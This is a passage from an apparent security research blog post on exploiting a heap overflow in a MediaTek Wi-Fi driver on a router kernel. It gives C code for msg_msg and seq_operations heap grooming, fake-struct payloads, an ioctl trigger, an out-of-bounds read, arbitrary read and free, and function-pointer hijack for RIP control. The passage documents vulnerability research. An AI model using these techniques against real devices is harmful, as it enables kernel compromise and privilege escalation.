a heap overflow. Beyond the direct utility as an infoleak, it’s also useful for gaining visibility
into slab layouts when working without direct introspection capabilities.</p>

<h4 id="heap-grooming-setup">heap grooming setup</h4>

<p>The heap grooming for this technique is identical to the example provided in the previous
section so I’m not going to repeat it all here but the basic sequence is:</p>

<ol>
  <li>Create N message queues</li>
  <li>Send 1 message on each queue to spray a total of N messages</li>
  <li>Read back M messages from a range of the sprayed queues/messages, reading only every other message, to open up holes where target allocations can be placed adjacent to allocated <code class="language-plaintext highlighter-rouge">msg_msg</code> structs</li>
</ol>

<p>There are a couple of specific values and fields that are worth mentioning since they play an
important role in how this technique is implemented.</p>

<p>First, the initial messages which are sprayed use an <code class="language-plaintext highlighter-rouge">m_ts</code> value of 0x40 to ensure they messages
land in the target slab cache (kmalloc-128). This field can then be used to determine whether the
attempt was successful or not: if we find any messages which don’t have the expected size, we know
we successfully corrupted the <code class="language-plaintext highlighter-rouge">m_ts</code> field.</p>

<p>Second, the sprayed messages are sent with a specific value in the <code class="language-plaintext highlighter-rouge">mtype</code> field which serves as a
unique identifier to distinguish between different types of messages. Again, we can use this as a
canary to determine whether we successfully corrupted the structure; more importantly, the <code class="language-plaintext highlighter-rouge">mtype</code>
value is used as a filter in calls to <code class="language-plaintext highlighter-rouge">msgrcv()</code>. This is important when <code class="language-plaintext highlighter-rouge">MSG_COPY</code> is unavailable
– if we use an <code class="language-plaintext highlighter-rouge">mtype</code> value of <code class="language-plaintext highlighter-rouge">0xBBBB</code> for the sprayed messages and then use that same <code class="language-plaintext highlighter-rouge">mtype</code>
value when calling <code class="language-plaintext highlighter-rouge">msgrcv()</code> to check the messages for corruption, we’ll dequeue and free each of
the messages we sprayed, messing up the heap layout. So, instead, we use the overflow to set the
<code class="language-plaintext highlighter-rouge">mtype</code> of the corrupted <code class="language-plaintext highlighter-rouge">msg_msg</code> to a different value and then use that as the filter when
searching through the messages. If the exploit is successful, then there should only be one message
with that <code class="language-plaintext highlighter-rouge">mtype</code> and the call to <code class="language-plaintext highlighter-rouge">msgrcv()</code> will ONLY operate on that message, leaving everything
else intact.</p>

<h4 id="building-the-payload">building the payload</h4>

<p>The corruption payload needs to construct a fake <code class="language-plaintext highlighter-rouge">msg_msg</code> header to overwrite a valid message in a
way that the kernel will accept without immediately panicking. The key fields that are relevant are:</p>

<ul>
  <li>
    <p><strong><code class="language-plaintext highlighter-rouge">m_list</code> pointers (<code class="language-plaintext highlighter-rouge">prev</code>/<code class="language-plaintext highlighter-rouge">next</code>)</strong>: These need to be valid writable kernel addresses. As
mentioned earlier, <code class="language-plaintext highlighter-rouge">msgrcv()</code> calls <code class="language-plaintext highlighter-rouge">list_del()</code> to unlink the message, which writes through these
pointers. This PoC uses the address leaked by the <code class="language-plaintext highlighter-rouge">RTMPIoctlMAC()</code> infoleak.</p>
  </li>
  <li>
    <p><strong><code class="language-plaintext highlighter-rouge">mtype</code></strong>: We want to set this to a “poison” value so we can identify the corrupted message when
searching through queues as mentioned above. It should be distinct from the <code class="language-plaintext highlighter-rouge">mtype</code> value used for
the messages used during the spraying phase (duh). The PoC uses <code class="language-plaintext highlighter-rouge">0x6666666666666690</code> to avoid
bytes restricted by the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> bug.</p>
  </li>
  <li>
    <p><strong><code class="language-plaintext highlighter-rouge">m_ts</code></strong>: The inflated size to use. When <code class="language-plaintext highlighter-rouge">msgrcv()</code> processes the message, it reads <code class="language-plaintext highlighter-rouge">m_ts</code>
bytes starting from the body. <code class="language-plaintext highlighter-rouge">m_ts</code> can hold up to <code class="language-plaintext highlighter-rouge">0xffffffffffffffff</code> but in practice using
such large values isn’t necessary (or even desirable). I used <code class="language-plaintext highlighter-rouge">0x1660</code> in the PoC to read a little
over a page (4KB) past the end of the message allocation.</p>
  </li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">fake_msg</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">m_prev</span><span class="p">;</span>    <span class="c1">// valid writable address</span>
    <span class="kt">uint64_t</span> <span class="n">m_next</span><span class="p">;</span>    <span class="c1">// same</span>
    <span class="kt">uint64_t</span> <span class="n">mtype</span><span class="p">;</span>     <span class="c1">// poison value for identification</span>
    <span class="kt">uint64_t</span> <span class="n">m_ts</span><span class="p">;</span>      <span class="c1">// inflated size for OOB read</span>
<span class="p">};</span>

<span class="cp">#define MTYPE_POISON 0x6666666666666690
</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">m_prev</span> <span class="o">=</span> <span class="n">mac_leaked</span><span class="p">;</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">m_next</span> <span class="o">=</span> <span class="n">mac_leaked</span><span class="p">;</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">mtype</span>  <span class="o">=</span> <span class="n">MTYPE_POISON</span><span class="p">;</span>
<span class="n">fake_msg</span><span class="p">.</span><span class="n">m_ts</span>   <span class="o">=</span> <span class="mh">0x1660</span><span class="p">;</span>

<span class="c1">// wrapper that triggers the vie_oper_proc bug with the payload placed at the slab slot boundary</span>
<span class="n">primitive_vie_oper_proc_oob_write</span><span class="p">(</span><span class="n">ifname</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">fake_msg</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">fake_msg</span><span class="p">));</span>
</code></pre></div></div>

<p>In regard to the <code class="language-plaintext highlighter-rouge">m_list</code> pointers and <code class="language-plaintext highlighter-rouge">mtype</code> field, it’s important to note that these fields are
only relevant in this case because the bug used to corrupt <code class="language-plaintext highlighter-rouge">m_ts</code> is a linear overflow that <em>must</em>
corrupt those other fields in order to reach <code class="language-plaintext highlighter-rouge">m_ts</code>. In cases where the starting bug allows for
direct corruption of <code class="language-plaintext highlighter-rouge">m_ts</code> without altering other fields (e.g. use-after-free), that’s the only
thing needed to get the OOB read.</p>

<h4 id="trigger-the-overflow-to-corrupt-msg_msg">trigger the overflow to corrupt msg_msg</h4>

<p>After the heap grooming setup is complete, the next step is to trigger the corruption which will let
us inflate the <code class="language-plaintext highlighter-rouge">m_ts</code> size of one of the allocated <code class="language-plaintext highlighter-rouge">msg_msg</code> objects. The function below wraps the
main logic used to construct the payload for the <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> bug and send it over an <code class="language-plaintext highlighter-rouge">ioctl()</code>
call: we compute the offset in the payload where we’ll start corrupting an adjacent object in the
slab cache, construct the initial payload buffer with the <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> command in the format
required to trigger the bug, and insert the data that will overwrite the target object at the
computed offset.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">primitive_vie_oper_proc_oob_write</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">ifname</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">size_t</span> <span class="n">corruption_offset</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">)</span> <span class="o">+</span> <span class="n">VIE_OPER_MIN_SIZE_TO_OVF</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">payload_size</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">)</span> <span class="o">+</span> <span class="n">VIE_OPER_MIN_SIZE_TO_OVF</span> <span class="o">+</span> <span class="n">size</span><span class="p">;</span>
    <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">payload</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">payload_size</span><span class="p">);</span>

    <span class="c1">// check for restricted bytes and die if we find any</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">ret</span> <span class="o">=</span> <span class="n">vie_oper_proc_check_bytes</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
      <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

    <span class="n">memset</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="n">payload_size</span><span class="p">);</span> <span class="cm">/* non-NULL to avoid restricted bytes */</span>

    <span class="c1">// copy in the "command" string for iwpriv formatted to trigger the vuln</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">VIE_OPER_CMD</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">));</span>

    <span class="c1">// copy in the true payload data at the offset where we start corrupting the next object</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span> <span class="o">+</span> <span class="n">corruption_offset</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>

    <span class="c1">// send the iwpriv command via an ioctl (cleaner than executing via the shell)</span>
    <span class="n">ioctl_send_iwpriv_set</span><span class="p">(</span><span class="n">ifname</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="n">payload_size</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After the overflow is triggered, the heap looks something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># vulnerable buf fills a hole, corrupts adjacent msg_msg
&lt;msg_msg&gt; &lt;vie_oper_buf&gt; &lt;msg_msg&gt; &lt;-HOLE-&gt; &lt;msg_msg&gt; &lt;HOLE&gt; &lt;msg_msg&gt; &lt;msg_msg&gt;
| ...... | AAAAAAAAAAAA | AAAA... |  ....  | .... |
</code></pre></div></div>

<h4 id="reading-back-the-corrupted-message">reading back the corrupted message</h4>

<p>After triggering the overflow, the corrupted message is somewhere in the sprayed messages. We don’t
know exactly which queue its in, so we search backwards through the queues looking for a message
with the poison <code class="language-plaintext highlighter-rouge">mtype</code> value:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="n">MSG_COUNT</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">read_back</span> <span class="o">=</span> <span class="n">msgrcv</span><span class="p">(</span><span class="n">qids</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">peekbuf</span><span class="p">,</span> <span class="n">PEEKSIZE</span><span class="p">,</span> <span class="n">MTYPE_POISON</span><span class="p">,</span> <span class="n">IPC_NOWAIT</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">read_back</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">read_back</span> <span class="o">!=</span> <span class="n">ORIG_BODY_SIZE</span><span class="p">)</span> <span class="p">{</span>
        <span class="cm">/* found it — read_back != original body size means the inflated size was used back */</span>
        <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Getting <strong>any</strong> message back on this search confirms the corruption happened (<code class="language-plaintext highlighter-rouge">mtype</code> was changed)
and getting back any number of bytes other than the original size of the sprayed messages confirms
the <code class="language-plaintext highlighter-rouge">m_ts</code> field was corrupted.</p>

<p>When this hits, <code class="language-plaintext highlighter-rouge">peekbuf</code> contains the original message body followed by whatever was adjacent in
the slab. The leaked data in the output of the PoC shows the adjacent <code class="language-plaintext highlighter-rouge">msg_msg</code> headers from the spray: the
<code class="language-plaintext highlighter-rouge">m_list</code> pointers of the linked list structure, the <code class="language-plaintext highlighter-rouge">mtype</code> values from the spray pattern (<code class="language-plaintext highlighter-rouge">0xab</code>),
and body sizes matching the original message size (<code class="language-plaintext highlighter-rouge">0x40</code>).</p>

<p><img src="/assets/images/mtk-images/mtk-r1kh-msg-m_ts-oob-read.png" alt="mtk-r1kh-msg-m_ts-oob-read.png" /></p>

<h3 id="tech-arbitrary-address-readfree-via-msg_msgnext-pointer-corruption">tech: arbitrary address read+free via msg_msg.next pointer corruption</h3>

<p>There’s actually another infoleak primitive that we can get through <code class="language-plaintext highlighter-rouge">msg_msg</code> corruption using the
exact same approach as the OOB read above, but overflowing an additional 8 bytes to corrupt the
<code class="language-plaintext highlighter-rouge">msg_msg.next</code> field of the message.</p>

<p>For messages which are split into segments (i.e. messages larger than (<code class="language-plaintext highlighter-rouge">PAGESZ - sizeof(struct
msg_msg)</code>), the <code class="language-plaintext highlighter-rouge">msg_msg.next</code> field will contain a pointer to the <code class="language-plaintext highlighter-rouge">msg_msgseg</code> segment for the
message. When the message is read back from the queue, <code class="language-plaintext highlighter-rouge">store_msg()</code> will check if <code class="language-plaintext highlighter-rouge">msg_msg.next</code>
is non-NULL, and if it is, that pointer will be read from and the data will be appended to the
body of the message returned to userspace at the offset where the segment would start.</p>

<p>I think you can see where this is going. If we know the address of some kernel memory we want to
read from, all we have to do is place that address at the offset of <code class="language-plaintext highlighter-rouge">msg_msg.next</code> during the
overflow and then read back the corrupted message from the queue using the same search loop used
above. Once the corrupted message is found, the data returned in the body will contain the content
stored at the target address.</p>

<p>There’s an additional side-effect that’s triggered by this technique which is worth discussing.
After the message is successfully read back from the queue in <code class="language-plaintext highlighter-rouge">do_msgrcv()</code>, that <code class="language-plaintext highlighter-rouge">msg_msg</code> will be
passed to <code class="language-plaintext highlighter-rouge">free_msg()</code>, which will loop through the linked list of <code class="language-plaintext highlighter-rouge">msg_msgseg</code> pointers starting at
<code class="language-plaintext highlighter-rouge">msg_msg.next</code> and pass each one to <code class="language-plaintext highlighter-rouge">kfree()</code>. In other words, an arbitrary address free! This
option does have one major constraint, though: the address used to corrupt <code class="language-plaintext highlighter-rouge">msg_msg.next</code> <em>must</em> be
a valid heap address, since <code class="language-plaintext highlighter-rouge">kfree()</code> will check to determine whether the address belongs to a slab
the allocator manages; passing a bad address here will cause a <code class="language-plaintext highlighter-rouge">BUG_ON</code> to be triggered, which will
usually cause a kernel panic.</p>

<p>I’ll hold off on discussing how this secondary primitive can be leveraged for now but keep an eye
out for the follow-up post with the full exploits for those details!</p>

<h3 id="tech-seq_operations-function-pointer-corruption">tech: seq_operations function pointer corruption</h3>

<p><strong>PoC: <code class="language-plaintext highlighter-rouge">primitives-dev-vie/vie-oper-msgmsg-stat-fctptr-01.c</code></strong></p>

<p><code class="language-plaintext highlighter-rouge">struct seq_operations</code> is <a href="https://devilinside.me/blogs/small-steps-kernel-exploitation" target="_blank">a well-known target</a>
in kernel exploitation, and for good reason: the struct is <em>nothing but function pointers</em>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">seq_operations</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">start</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">pos</span><span class="p">);</span>
    <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">stop</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">);</span>
    <span class="kt">void</span> <span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">next</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">,</span> <span class="n">loff_t</span> <span class="o">*</span><span class="n">pos</span><span class="p">);</span>
    <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">show</span><span class="p">)</span> <span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div></div>

<p>If we can corrupt any of them, the kernel will jump to whatever address we write -&gt; instant RIP
control. The best part is we can trigger the allocation <em>and</em> use of these pointers entirely from
userspace.</p>

<h4 id="how-it-works">how it works</h4>

<p>Files under <code class="language-plaintext highlighter-rouge">/proc</code> that use the <code class="language-plaintext highlighter-rouge">seq_file</code> interface (like <code class="language-plaintext highlighter-rouge">/proc/self/stat</code>) allocate a
<code class="language-plaintext highlighter-rouge">seq_operations</code> struct when opened. The allocation happens through
<a href="https://elixir.bootlin.com/linux/v4.4.198/source/fs/seq_file.c#L554" target="_blank"><code class="language-plaintext highlighter-rouge">single_open()</code></a>,
which creates both a <code class="language-plaintext highlighter-rouge">seq_operations</code> struct and a <code class="language-plaintext highlighter-rouge">seq_file</code> struct. The <code class="language-plaintext highlighter-rouge">seq_operations</code> gets
populated with pointers to <code class="language-plaintext highlighter-rouge">single_start()</code>, <code class="language-plaintext highlighter-rouge">single_stop()</code>, <code class="language-plaintext highlighter-rouge">single_next()</code>, and a <code class="language-plaintext highlighter-rouge">show()</code>
handler specific to the file being opened.</p>

<p>When you call <code class="language-plaintext highlighter-rouge">read()</code> on the file descriptor for one of these types of files,
<a href="https://elixir.bootlin.com/linux/v4.4.198/source/fs/seq_file.c#L233" target="_blank"><code class="language-plaintext highlighter-rouge">seq_read()</code></a>
dispatches through these function pointers:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* in seq_read() */</span>
<span class="n">pos</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">index</span><span class="p">;</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">start</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pos</span><span class="p">);</span>        <span class="c1">// &lt;-- calls through our pointer</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">show</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>      <span class="c1">// &lt;-- and this one</span>
    <span class="p">...</span>
    <span class="n">p</span> <span class="o">=</span> <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pos</span><span class="p">);</span>  <span class="c1">// &lt;-- and this one</span>
    <span class="p">...</span>
    <span class="n">m</span><span class="o">-&gt;</span><span class="n">op</span><span class="o">-&gt;</span><span class="n">stop</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>            <span class="c1">// &lt;-- and this one</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So the plan is: spray <code class="language-plaintext highlighter-rouge">seq_operations</code> by opening a bunch of <code class="language-plaintext highlighter-rouge">/proc/self/stat</code> file descriptors,
use the heap overflow to corrupt the function pointers in one of them, then call <code class="language-plaintext highlighter-rouge">read()</code>/<code class="language-plaintext highlighter-rouge">write()</code>
on each fd to trigger the corrupted pointer. If the corruption landed, the kernel jumps to
whatever address we wrote.</p>

<p>One detail worth noting: <code class="language-plaintext highlighter-rouge">seq_operations</code> is only 32 bytes (<code class="language-plaintext highlighter-rouge">0x20</code>), which on most kernels would
put it in <code class="language-plaintext highlighter-rouge">kmalloc-32</code> or similar. This technique requires <code class="language-plaintext highlighter-rouge">seq_operations</code> to share a slab cache
with the overflow target — which is the case here because the kernel on the WAX206 lacks smaller
general-purpose caches (see target-specific notes).</p>

<h4 id="heap-grooming-setup-1">heap grooming setup</h4>

<p>The heap grooming setup for this approach is slightly different vs. the OOB read described in the
previous section so let’s go over it real quick.</p>

<p>We’re targeting the <code class="language-plaintext highlighter-rouge">seq_operations</code> struct, which gets allocated when we open <code class="language-plaintext highlighter-rouge">/proc/self/stat</code>.
Theoretically, we could just use that to do all of the heap spraying by opening a ton of file
descriptors for <code class="language-plaintext highlighter-rouge">/proc/self/stat</code>, but in practice there are limits to how many fds we’re allowed to
open at once and that might be too restrictive depending on how much we need to spray to exhaust the
active and partial slabs. To get around this, we just use <code class="language-plaintext highlighter-rouge">msg_msg</code> to do the initial spray which
exhausts the slabs and spray the <code class="language-plaintext highlighter-rouge">seq_operations</code> structs into a hole opened up in the <code class="language-plaintext highlighter-rouge">msg_msg</code>
spray.</p>

<p>In whole, the sequence is:</p>

<ol>
  <li>Spray <code class="language-plaintext highlighter-rouge">msg_msg</code> to exhaust <code class="language-plaintext highlighter-rouge">kmalloc-128</code></li>
  <li>Open holes in the <code class="language-plaintext highlighter-rouge">msg_msg</code> spray (a sequential block near the tail end)</li>
  <li>Spray <code class="language-plaintext highlighter-rouge">seq_operations</code> by opening <code class="language-plaintext highlighter-rouge">/proc/self/stat</code> (these fill the holes)</li>
  <li>Open holes in the <code class="language-plaintext highlighter-rouge">seq_operations</code> spray (by closing every other fd in the spray)</li>
  <li>Trigger the overflow; it fills a hole adjacent to a remaining <code class="language-plaintext highlighter-rouge">seq_operations</code> struct</li>
</ol>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// spray msg_msg first</span>
    <span class="n">init_msgq</span><span class="p">(</span><span class="n">qids_0</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">);</span>
    <span class="n">msgq_spray</span><span class="p">(</span><span class="n">qids_0</span><span class="p">,</span> <span class="n">MSG_COUNT</span><span class="p">,</span> <span class="n">dummy</span><span class="p">,</span> <span class="n">ACTIVE_BODY_SIZE</span><span class="p">);</span>

    <span class="c1">// open up a hole from those allocations near the tail end</span>
    <span class="kt">int</span> <span class="n">hole_start</span> <span class="o">=</span> <span class="n">MSG_COUNT</span> <span class="o">-</span> <span class="mi">140</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">hole_end</span> <span class="o">=</span> <span class="n">MSG_COUNT</span> <span class="o">-</span> <span class="mi">100</span><span class="p">;</span>
    <span class="n">msgq_open_holes_range</span><span class="p">(</span><span class="n">qids_0</span><span class="p">,</span> <span class="n">hole_start</span><span class="p">,</span> <span class="n">hole_end</span><span class="p">,</span> <span class="n">MTYPE_ORIG</span><span class="p">,</span> <span class="n">ACTIVE_BODY_SIZE</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>

    <span class="c1">// fill the holes up with seq_operations allocations</span>
    <span class="n">fd_spray_init</span><span class="p">(</span><span class="n">fds</span><span class="p">,</span> <span class="n">FDSPRAY_SIZE</span><span class="p">,</span> <span class="n">TARGET_OPEN_PATH</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="o">|</span><span class="n">O_NOCTTY</span><span class="p">);</span>

    <span class="c1">// open interleaving holes in seq_operations allocs to prepare for the corruption step</span>
    <span class="n">fd_open_holes_even</span><span class="p">(</span><span class="n">fds</span><span class="p">,</span> <span class="n">FDSPRAY_SIZE</span><span class="p">);</span>
</code></pre></div></div>

<h4 id="constructing-the-payload-to-corrupt-seq_operations">constructing the payload to corrupt seq_operations</h4>

<p>The payload for this technique is about as simple as it gets. <code class="language-plaintext highlighter-rouge">seq_operations</code> is 32 bytes of
nothing but function pointers; all we need to write is four 8-byte addresses. Since the overflow
is linear, those values land directly over <code class="language-plaintext highlighter-rouge">start</code>, <code class="language-plaintext highlighter-rouge">stop</code>, <code class="language-plaintext highlighter-rouge">next</code>, and <code class="language-plaintext highlighter-rouge">show</code> in order.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">fake_seqops</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">start</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">stop</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">next</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="n">show</span><span class="p">;</span>
<span class="p">};</span>

<span class="kt">uint64_t</span> <span class="n">target_addr</span> <span class="o">=</span> <span class="mh">0x4141414141414140</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">fake_seqops</span> <span class="n">ops</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">start</span> <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x10</span><span class="p">,</span>
    <span class="p">.</span><span class="n">stop</span>  <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x20</span><span class="p">,</span>
    <span class="p">.</span><span class="n">next</span>  <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x30</span><span class="p">,</span>
    <span class="p">.</span><span class="n">show</span>  <span class="o">=</span> <span class="n">target_addr</span><span class="o">+</span><span class="mh">0x40</span><span class="p">,</span>
<span class="p">};</span>
<span class="n">primitive_vie_oper_proc_oob_write</span><span class="p">(</span><span class="n">ifname</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ops</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">ops</span><span class="p">));</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">target_addr</code> placeholder above is just a dummy value to prove we get RIP control; in a real
exploit, these would be addresses of useful kernel functions or gadgets (as shown in the <code class="language-plaintext highlighter-rouge">kfree()</code>
UaF discussion below). The byte restriction from <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> is the main constraint here:
addresses cannot contain NULL bytes or whitespace (<code class="language-plaintext highlighter-rouge">0x00</code>, <code class="language-plaintext highlighter-rouge">0x09</code>, <code class="language-plaintext highlighter-rouge">0x0a</code>, <code class="language-plaintext highlighter-rouge">0x0d</code>, <code class="language-plaintext highlighter-rouge">0x20</code>). On our
target this isn’t a practical issue since kernel text addresses start at <code class="language-plaintext highlighter-rouge">0xffffff80...</code> and heap
addresses at <code class="language-plaintext highlighter-rouge">0xffffffc0...</code>; neither range contains restricted bytes in any of the eight positions.</p>

<p>After the overflow, the fds that survived the hole-poking step (the odd-indexed ones) are the ones
that might reference a corrupted <code class="language-plaintext highlighter-rouge">seq_operations</code>. Reading from them triggers <code class="language-plaintext highlighter-rouge">seq_read()</code>, which
dispatches through the corrupted function pointers:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">FDSPRAY_SIZE</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">read</span><span class="p">(</span><span class="n">fds</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">bb</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">bb</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the corruption landed, the kernel will attempt to call our fake <code class="language-plaintext highlighter-rouge">start</code> pointer. With dummy
values like <code class="language-plaintext highlighter-rouge">0x41414141...</code> this results in a panic at a controlled address, confirming
RIP control.</p>

<p><img src="/assets/images/mtk-images/mtk-vie-seqops.png" alt="mtk-vie-seqops.png" /></p>

<h4 id="using-code-exec-primitives-to-induce-uafs">using code exec primitives to induce UaFs?</h4>

<p>Beyond direct RIP control, this primitive can be used to induce use-after-frees. On a target
without KASLR or where kernel addresses can be leaked, we can point a hijacked function pointer at any
kernel function…like <code class="language-plaintext highlighter-rouge">kfree()</code>, for example.</p>

<p>In this particular case: when <code class="language-plaintext highlighter-rouge">seq_read()</code> calls <code class="language-plaintext highlighter-rouge">m-&gt;op-&gt;start(m, &amp;pos)</code>, the first argument (<code class="language-plaintext highlighter-rouge">m</code>)
is a pointer to the <code class="language-plaintext highlighter-rouge">seq_file</code> struct. If we overwrite <code class="language-plaintext highlighter-rouge">seq_operations.start()</code> with the address of
<code class="language-plaintext highlighter-rouge">kfree()</code>, then calling <code class="language-plaintext highlighter-rouge">read()</code> on the corrupted fd will call <code class="language-plaintext highlighter-rouge">kfree()</code> on the <code class="language-plaintext highlighter-rouge">seq_file</code> struct,
freeing it <em>while we still hold a file descriptor that references it</em>, i.e. use-after-free!</p>

<p>From here, a number of exploitation paths open up: reclaim the freed <code class="language-plaintext highlighter-rouge">seq_file</code> with a controlled
allocation (e.g. <code class="language-plaintext highlighter-rouge">msg_msg</code>), use the stale fd to trigger further reads/writes through the
reclaimed data, etc.</p>

<p>One practical concern worth noting: on kernels where <code class="language-plaintext highlighter-rouge">seq_operations</code> shares a cache with
<code class="language-plaintext highlighter-rouge">seq_file</code> (as is the case here), stability can be an issue. Opening holes in the spray by closing
file descriptors frees both structs, and the lack of separation means the overflow might corrupt
